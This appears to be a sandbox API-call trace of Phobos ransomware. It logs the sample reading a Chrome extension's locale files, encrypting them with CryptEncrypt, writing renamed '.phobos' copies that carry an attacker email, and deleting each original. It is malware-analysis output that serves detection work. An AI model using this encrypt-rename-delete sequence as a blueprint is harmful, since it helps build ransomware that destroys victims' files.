[0149.312] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0149.313] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0149.313] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.313] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.313] CryptDestroyKey (hKey=0xa32de8) returned 1 [0149.313] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.313] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.313] CloseHandle (hObject=0x188) returned 1 [0149.313] CloseHandle (hObject=0x134) returned 1 [0149.313] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json")) returned 1 [0149.314] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.315] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=209) returned 1 [0149.315] CloseHandle (hObject=0x134) returned 1 [0149.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json")) returned 0x2020 [0149.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.315] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.315] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.315] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.315] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.316] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd1, lpOverlapped=0x0) returned 1 [0149.316] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0149.316] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0149.317] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0149.317] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.317] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.317] CryptDestroyKey (hKey=0xa32de8) returned 1 [0149.317] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.317] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.317] CloseHandle (hObject=0x134) returned 1 [0149.317] CloseHandle (hObject=0x188) returned 1 [0149.318] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\messages.json")) returned 1 [0149.319] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.319] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=213) returned 1 [0149.319] CloseHandle (hObject=0x188) returned 1 [0149.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json")) returned 0x2020 [0149.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.319] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.319] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.320] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.320] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.320] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd5, lpOverlapped=0x0) returned 1 [0149.321] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0149.321] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0149.321] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0149.321] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.321] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.322] CryptDestroyKey (hKey=0xa32de8) returned 1 [0149.322] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.322] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.322] CloseHandle (hObject=0x188) returned 1 [0149.322] CloseHandle (hObject=0x134) returned 1 [0149.322] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\messages.json")) returned 1 [0149.323] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.325] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=221) returned 1 [0149.326] CloseHandle (hObject=0x134) returned 1 [0149.326] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json")) returned 0x2020 [0149.326] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0149.326] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.326] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0149.327] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0149.327] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.327] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xdd, lpOverlapped=0x0) returned 1 [0149.328] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0149.328] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0149.329] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0149.329] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.329] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.329] CryptDestroyKey (hKey=0xa32de8) returned 1 [0149.329] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.329] CryptDestroyKey (hKey=0xa327e8) returned 1 [0149.329] CloseHandle (hObject=0x134) returned 1 [0149.329] CloseHandle (hObject=0x188) returned 1 [0149.329] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\messages.json")) returned 1 [0149.330] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.938] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=218) returned 1 [0149.938] CloseHandle (hObject=0x190) returned 1 [0149.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json")) returned 0x2020 [0149.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.939] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.939] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0149.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.939] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32da8) returned 1 [0149.939] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.939] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xda, lpOverlapped=0x0) returned 1 [0149.940] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0149.940] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0149.941] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32c28) returned 1 [0149.941] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0149.941] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0149.941] CryptDestroyKey (hKey=0xa32c28) returned 1 [0149.941] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0149.942] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.942] CloseHandle (hObject=0x190) returned 1 [0149.942] CloseHandle (hObject=0x148) returned 1 [0149.942] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ko\\messages.json")) returned 1 [0149.943] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0149.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0150.314] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=11094) returned 1 